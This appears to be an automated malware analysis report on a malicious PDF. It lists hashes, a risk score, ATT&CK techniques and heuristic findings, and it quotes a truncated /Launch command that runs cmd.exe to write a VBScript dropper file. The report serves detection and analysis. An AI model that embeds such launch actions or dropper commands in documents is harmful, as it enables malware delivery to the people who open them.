PDF malware analysis — malicious · bd762e98bddca0e4

MALICIOUS

PDF

2.09 MB Created: 2010-10-28 10:43:50 Authoring application: FPDF 1.53

MD5: c41c0b9e91b027e798f576bf56b021ae SHA-1: f2be325b4f5e41a54e34e988a64c5f1acf019238 SHA-256: bd762e98bddca0e4176e5a9281b3c2c69dd894eef5dec6af7a5761ef8ed58b92

190 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1204.002 Malicious File

The PDF file contains a critical PDF_LAUNCH heuristic firing, indicating a launch action. This action targets cmd.exe with parameters that construct and write a VBScript file named 'vbs1.vbs'. The embedded script payload, though truncated, is indicative of malicious intent to execute further stages. The ML classifier also strongly flagged this PDF as malicious.

Machine Learning

Nyx PDF Classifier malicious score 0.9996

Heuristics 3

Launch action critical PDF_LAUNCH

PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
/Launch action target: cmd.exe critical PDF_LAUNCH_COMMAND

PDF /Launch action specifies an executable target with parameters '/c echo Dim BinaryStream > vbs1.vbs && echo Set BinaryStream = CreateObject("ADODB.Stream"' — references a known-dangerous executable (cmd, PowerShell, etc.).
Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOAD

PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`embedded_pdf_script_0000057b.bin` `40abd21cc16d7f47deccc3a181fad013ee9391fed16bacfc36cd3459490f7ecc`	pdf-embedded-script	PDF decompressed stream script payload at offset 0x57B	90 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.